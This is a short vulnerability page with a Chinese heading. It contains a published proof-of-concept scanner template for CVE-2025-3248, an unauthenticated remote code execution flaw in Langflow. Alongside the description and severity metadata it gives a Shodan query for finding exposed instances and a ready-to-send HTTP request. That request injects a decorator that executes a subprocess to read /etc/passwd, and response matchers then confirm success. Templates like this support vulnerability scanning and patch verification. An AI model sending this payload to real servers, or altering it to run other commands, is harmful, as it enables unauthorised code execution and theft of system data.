漏洞描述
Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
CVE-2025-3248: Langflow AI - Unauthenticated Remote Code Execution
PoC代码[已公开]
id: CVE-2025-3248
info:
name: Langflow AI - Unauthenticated Remote Code Execution
author: nvn1729
severity: critical
description: |
Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
reference:
- https://github.com/langflow-ai/langflow/pull/6911
- https://github.com/langflow-ai/langflow/releases/tag/1.3.0
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-3248
cwe-id: CWE-306
epss-score: 0.92851
epss-percentile: 0.99755
metadata:
verified: true
max-request: 1
shodan-query: html:"Langflow"
tags: cve,cve2025,python,rce,injection,kev,langflow,vkev
http:
- raw:
- |
POST /api/v1/validate/code HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"cat\", \"/etc/passwd\"]))')\ndef foo():\n pass"}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a004730450220436d6f8e4b1335f05d3b04e1794f4ba17170b3670a5a6668447391e9fde67aa7022100e05cc9568dd18acdbe90426673bc828fd8ab860b5a0a5d85c715a6d7d777ddb7:922c64590222798bb761d5b6d8e72950